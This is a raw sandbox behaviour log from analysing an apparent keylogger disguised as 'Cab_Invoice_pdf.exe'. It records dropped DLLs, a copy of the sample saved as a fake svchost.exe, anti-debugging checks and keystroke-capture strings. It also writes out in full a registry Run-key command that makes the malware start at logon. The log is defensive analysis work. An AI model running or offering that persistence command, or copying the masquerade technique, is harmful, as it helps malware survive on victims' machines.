Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeAPI coverage: 3.6 %
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA755C0 PyArg_ParseTuple,GetSystemInfo,PyLong_FromUnsignedLongLong,?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z,?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z,Py_BuildValue,19_2_6DA755C0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0132715E FindFirstFileExW,1_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,1_2_0131E260
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0132715E FindFirstFileExW,3_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,3_2_0131E260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,11_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD715E FindFirstFileExW,11_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD715E FindFirstFileExW,19_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,19_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA72F40 PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyList_New,_Py_Dealloc,FindFirstFileW,GetLastError,?PyObject_FromWIN32_FIND_DATAW@@YAPAU_object@@PAU_WIN32_FIND_DATAW@@@Z,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,FindNextFileW,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,FindClose,_Py_Dealloc,19_2_6DA72F40
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA747B0 PyArg_ParseTuple,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z,19_2_6DA747B0
Source: svchost.exe, 0000000C.00000002.410422151.0000020D17AE9000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.410442915.0000020D17AF8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.410368973.0000020D17AA8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327131318.0000000000F38000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329527559.0000000000F01000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329669205.0000000000F2A000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.326143603.0000000000F38000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.357303459.0000000000F38000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01318111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01318111
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01314740 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01314740
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01328587 GetProcessHeap,1_2_01328587
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01320158 mov eax, dword ptr fs:[00000030h]1_2_01320158
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01320158 mov eax, dword ptr fs:[00000030h]3_2_01320158
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD0158 mov eax, dword ptr fs:[00000030h]11_2_00BD0158
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD0158 mov eax, dword ptr fs:[00000030h]19_2_00BD0158
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131825F SetUnhandledExceptionFilter,1_2_0131825F
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01318111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01318111
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01317B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01317B8A
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013215BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013215BE
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01318111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01318111
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01317B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_01317B8A
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0131825F SetUnhandledExceptionFilter,3_2_0131825F
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_013215BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_013215BE
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F4E29 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E2F4E29
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F4695 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E2F4695
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F4FBF SetUnhandledExceptionFilter,3_2_6E2F4FBF
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC8111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00BC8111
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC825F SetUnhandledExceptionFilter,11_2_00BC825F
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC7B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00BC7B8A
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD15BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00BD15BE
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC8111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00BC8111
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC825F SetUnhandledExceptionFilter,19_2_00BC825F
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC7B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00BC7B8A
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD15BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00BD15BE
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7DCD2 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6DA7DCD2
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7DF9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_6DA7DF9E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7DE67 SetUnhandledExceptionFilter,19_2_6DA7DE67
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA9346C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_6DA9346C
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA92FD7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6DA92FD7
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA9316C SetUnhandledExceptionFilter,19_2_6DA9316C
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DABA65C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_6DABA65C
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DABA1C6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6DABA1C6
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DABA35B SetUnhandledExceptionFilter,19_2_6DABA35B
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAEA7BD SetUnhandledExceptionFilter,22_2_6DAEA7BD
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE9E8B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_6DAE9E8B
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAEA627 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6DAEA627
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0D3B7 SetUnhandledExceptionFilter,22_2_6DB0D3B7
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0C721 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_6DB0C721
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0D221 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6DB0D221
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7B330 PyArg_ParseTuple,PyEval_SaveThread,keybd_event,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,19_2_6DA7B330
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeProcess created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7B3B0 PyArg_ParseTuple,PyEval_SaveThread,mouse_event,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,19_2_6DA7B3B0
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: Cab_Invoice_pdf.exe, 00000003.00000002.565410673.0000000003260000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.564851419.0000000003180000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565254568.0000000003210000.00000004.00000001.sdmpBinary or memory string: [OnWard Data Entered In : Program Manager]
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmpBinary or memory string: Progman
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
